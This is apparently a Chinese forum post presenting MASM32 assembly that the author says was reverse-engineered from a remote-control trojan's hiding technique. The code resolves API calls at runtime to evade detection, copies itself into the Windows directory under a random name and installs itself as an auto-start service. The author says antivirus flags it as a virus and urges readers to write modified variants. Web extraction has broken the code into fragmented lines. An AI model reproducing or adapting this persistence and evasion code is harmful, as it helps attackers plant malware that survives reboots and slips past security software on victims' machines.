老王教你分析远控木马是怎样工作的
本 来是一个朋友给我,要我找下后门的,可是这远控太强大了,而且作者的汇编基础非常强,就没找到,倒是无巧不成书的,发现了他的隐藏技术,瞬间感觉喜欢上 了,于是写成了win32 分享下,3分钟前,主动防御会拦截,但是电脑重启后 程序可以运行,现在又测试了下,已经变成高危病毒了,无语的360啊。。。源码如下,各位可以根据 需要修改:
[AppleScript] 纯文本查看 复制代码
?
|
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
|
.
386
.model flat
,
stdcall
option casemap
:
none
include windows.inc
include user
32.
inc
includelib user
32.
lib
include kernel
32.
inc
includelib kernel
32.
lib
;
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
函数名称
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
.const
sz
11
db
"程序已经在windows目录下了"
,
0
sz
22
db
"标题"
,
0
szUnlockService db
"UnlockServiceDatabase"
,
0
szExe db
"\%c%c%c%c%c%c.exe"
,
0
szTest db
".Test1"
,
0
szCunMang db
".CunMang1"
,
0
szMiaoShu db
"BingDuMiaoShu"
,
0
szGetModuleFileName db
"GetModuleFileNameA"
,
0
szGetWindowsDirectory db
"GetWindowsDirectoryA"
,
0
szCopyFile db
"CopyFileA"
,
0
szOpenSCM db
"OpenSCManagerA"
,
0
szCloseServiceHandle db
"CloseServiceHandle"
,
0
szStartService db
"StartServiceA"
,
0
szChangeService db
"ChangeServiceConfig2A"
,
0
szAdvapi
32
db
"ADVAPI32.DLL"
,
0
szCreateService db
"CreateServiceA"
,
0
szGetTickCount db
"GetTickCount"
,
0
szKernel db
"kernel32.dll"
,
0
szLockService db
"LockServiceDatabase"
,
0
;
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
函数地址
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
.
data
szFileName db
128
dup
(
?
)
;当前路径
szWindowDirect db
128
dup
(
?
)
;windows目录路径
szNullFileName db
128
dup
(
?
)
;windows目录路径,这个加上了exe
szMuBiaoName db
128
dup
(
?
)
;清
0
的内存
szTime dd
1
szExeBuffer db
128
dup
(
?
)
HandleData dd ?
HandleCreateService dd ?
szLocalService
1
dd ?
addrKernel dd ?
addrGetModuleFileName dd ?
addrGetWindowsDirectory dd ?
addrCopyFile dd ?
addrAdv dd ?
addrOpenSCM dd ?
addrOpenService dd ?
addrCreateService dd ?
addrCloseServiceHandle dd ?
addrLockService dd ?
addrUnlockService dd ?
addrChangeService dd ?
addrStartService dd ?
addrGetTickCount dd ?
;
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
代码段
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
.code
_SuanFa proc szVar
push esi
call addrGetTickCount
mov esi
,
eax ;时间的返回值
mov eax
,
szTime
imul eax
,
eax
,
343
FDh
add
eax
,
269
EC
3
h
mov szTime
,
eax ;变量的值改变
sar eax
,
10
h
and
eax
,
7
FFFh
add
eax
,
3
h ;eax的值也改变
xor edx
,
edx ;高位是
0
因为除以的是
32
位数值
imul eax
,
esi ;esi是原来时间函数的返回值,这里与算法后的eax想乘
div
szVar
pop esi
mov eax
,
edx ;余数返回给eax
ret
_SuanFa endp
start
:
;
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
这是ADVAPI
32.
DLL中的敏感函数
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
push
offset
szAdvapi
32
call LoadLibrary
mov addrAdv
,
eax ;得到ADVAPI
32.
dll
push
offset
szOpenSCM
push addrAdv
call GetProcAddress ;得到OpenSCManager
mov addrOpenSCM
,
eax
push
offset
szCloseServiceHandle
push addrAdv
call GetProcAddress ;得到CloseService
mov addrCloseServiceHandle
,
eax
push
offset
szStartService
push addrAdv
call GetProcAddress
mov addrStartService
,
eax ;得到StartService
push
offset
szLockService
push addrAdv
call GetProcAddress
mov addrLockService
,
eax ;得到LockService
push
offset
szUnlockService
push addrAdv
call GetProcAddress
mov addrUnlockService
,
eax ;得到UnlockServiceDatabase
push
offset
szChangeService
push addrAdv
call GetProcAddress
mov addrChangeService
,
eax ;得到ChangeServiceConfig
2
A
push
offset
szCreateService
push addrAdv
call GetProcAddress
mov addrCreateService
,
eax ;得到CreateService
;
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
这是kernel
32
中的敏感函数
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
push
offset
szKernel
call GetModuleHandle
mov addrKernel
,
eax ;得到kernel
32
的句柄
push
offset
szGetModuleFileName
push addrKernel
call GetProcAddress
mov addrGetModuleFileName
,
eax ;得到GetModuleFile
push
offset
szGetWindowsDirectory
push addrKernel
call GetProcAddress
mov addrGetWindowsDirectory
,
eax ;得到GetWindowsDirectory
push
offset
szCopyFile
push addrKernel
call GetProcAddress
mov addrCopyFile
,
eax ;得到CopyFile
push
offset
szGetTickCount
push addrKernel
call GetProcAddress
mov addrGetTickCount
,
eax ;得到GetTickCount
push
128
push
offset
szFileName
push NULL
call addrGetModuleFileName ;返回值是名字的长度,名称已经放到了缓冲区
push
128
push
offset
szWindowDirect
call addrGetWindowsDirectory ;得到windoes目录,如果是system
32
则是GetSystemDirectory
push
128
push
offset
szNullFileName
call addrGetWindowsDirectory ;再次得到windows目录
mov edi
,
offset
szWindowDirect ;比较字符串中的内容
mov ebx
,
edi
mov ecx
,
128
;比较FFFF FFFF次
mov al
,
0
;比较的字符是
0
cld
repne scasb ;当CX
=
0
或者 ZF
=
1
就退出循环
sub edi
,
ebx ;此时edi就是字符长度
sub edi
,
1
;减去字符串结尾的
0
mov ecx
,
edi
mov esi
,
offset
szFileName ;源字符串
mov edi
,
offset
szWindowDirect ;目的字符串
s
:
mov al
,
[esi]
mov bl
,
[edi]
cmp al
,
bl
jnz WindowsName ;如果不在windows目录下,就开始复制到windows下面了
inc esi
inc edi
loop s
jmp _Service ;能走到这一步,代表已经比较完了,字符串肯定相等,就开始服务了
WindowsName
:
;如果已经在windows目录下了,就进行设置服务函数
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
push
61
h
pop edi
add
eax
,
edi
push eax ;第一个字符
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
add
eax
,
edi
push eax ;第二个字符
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
add
eax
,
edi
push eax ;第三个字符
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
add
eax
,
edi
push eax ;第四个字符
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
add
eax
,
edi
push eax ;第五个字符
push
1
Ah
call _SuanFa
mov ecx
,
1
Ah
add
eax
,
edi
push eax ;第六个字符
push
offset
szExe
push
offset
szExeBuffer
call wsprintf
invoke lstrcat
,
offset
szNullFileName
,
offset
szExeBuffer
push TRUE
push
offset
szNullFileName
push
offset
szFileName
call addrCopyFile ;开始复制
invoke RtlMoveMemory
,
offset
szFileName
,
offset
szMuBiaoName
,
120
;内存清零
invoke RtlMoveMemory
,
offset
szFileName
,
offset
szNullFileName
,
120
;填充新的路径
invoke MessageBox
,
NULL
,
offset
szNullFileName
,
offset
szWindowDirect
,
MB_OK
jmp Windows
_Service
:
invoke MessageBox
,
NULL
,
offset
sz
11
,
offset
sz
22
,
MB_OK
Windows
:
push SC_MANAGER_ALL_ACCESS ;OD中这个显示的是数值F
003
F,那么肯定有朋友要知道我是怎么知道这个宏的,很简单,载入IDA,右键Use Stadard Symbolic....
push NULL ;如果该指针为NULL ,该ServicesActive数据库默认情况下打开。
push NULL ;如果该指针为NULL ,或者如果它指向一个空字符串,函数连接到服务控制管理器在本地计算机上。
call addrOpenSCM ;函数建立了一个连接到服务控制管理器,并打开指定的数据库。
mov HandleData
,
eax ;如果函数成功,返回值是一个句柄指定的服务控制管理器数据库
mov edi
,
eax ;先保存起来,因为参数需要eax
xor ebx
,
ebx
cmp edi
,
ebx ;测试返回值
jz _exit
mov eax
,
ebx
mov ebx
,
eax
xor ebx
,
ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push
offset
szFileName
push SERVICE_ERROR_NORMAL
push SERVICE_AUTO_START
push SERVICE_WIN
32
_OWN_PROCESS
or
SERVICE_INTERACTIVE_PROCESS
push SERVICE_ALL_ACCESS
push
offset
szCunMang
push
offset
szTest
push edi
call addrCreateService ;创建一个服务对象并且把它加入到服务管理数据库中
mov HandleCreateService
,
eax ;保存句柄
push edi
call addrLockService ;锁定数据库
mov szLocalService
1
,
eax
push
offset
szMiaoShu
push
1
push
0
call addrChangeService
push szLocalService
1
call addrUnlockService
push
0
push
0
push
0
call addrStartService
_exit
:
invoke ExitProcess
,
NULL
end
start
|
很简单,没有什么危害性操作,只是弹出个对话框提示下,一天一夜逆出来的,很累,再加上360的捣乱,实在没心情重写了,各位看懂后,就写个变形的吧,唉,喝豆奶粉补充下营养去。。。(只限技术交流)